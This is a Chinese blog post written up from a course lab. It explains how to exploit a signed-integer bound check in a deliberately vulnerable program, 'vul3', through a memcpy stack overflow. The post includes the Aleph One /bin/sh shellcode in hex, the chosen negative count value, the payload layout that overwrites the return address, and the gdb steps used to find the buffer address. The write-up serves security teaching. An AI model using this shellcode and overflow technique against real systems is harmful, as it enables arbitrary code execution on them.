缓冲区溢出实验 3 负数溢出

实验环境、代码、及准备

 https://www.cnblogs.com/lqerio/p/12870834.html

 

vul3

 

 

 

 

 

分析Vul3可知输入为整数count和字符串in。vul3中使用if判断来防溢出,问题在于一个足够小点负数可以满足 if 的条件进入memcpy函数,而负数*sizeof(widget_t)可能溢出产生正数。故要对vul3栈溢出攻击只需要构造合适的负数count产生溢出和字符串in覆盖buf然后覆盖ebp,ret即可。

 

shellcode(构造过程)

原理是运行/bin/sh 来得到shell,构造过程是将具有运行/bin/sh的C代码转换成有相同功能的机器码。注意代码中用到  0  的地方改成用 xor  eax,eax,这样可以避免复制字符串时遇到/0 中断。

下面的shellcode长度为45字节(不含/0)

 

/*

 * Aleph One shellcode.

 */

static const char shellcode[] =

  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

 

exploit3

由vul3可知buf数组20*1000=20000字节

溢出部分如下,widget-t结构体20字节。Count*20>20000即可。

  if (count < MAX_WIDGETS)

memcpy(buf, in, count * sizeof(struct widget_t));

设count 为1001,符合1001*20>20000. 1001 16进制为\X3e9。

负数符号位为1,得到\x800003e9。计算可知由于溢出,20*\x3e9=20*\x800003e9。\x800003e9在计算机中存储为补码2147482647.故count为  -2147482647.

然后构造payload。Buf大小为20000字节,故返回地址在20008字节处。覆盖该地址内存为buf的起始地址,然后buf覆盖为shellcode即可。

Payload=count(12字节)+45字节shellcode+19965nop+4nop(ebp)+ret(buf基址)。

Buf基址:先随便填payload,然后使用gdb调试得到;

 

 

 

Gdb vul3

set args 3,666

disas foo

break *0x0804850b

r

print &buf

 

 

 

 

 

得到buf基址 0xbfffa140

填充payload最后4字节即可

 

 

运行结果

 

posted @ 2020-05-11 18:23  Erio  阅读(1257)  评论(0编辑  收藏  举报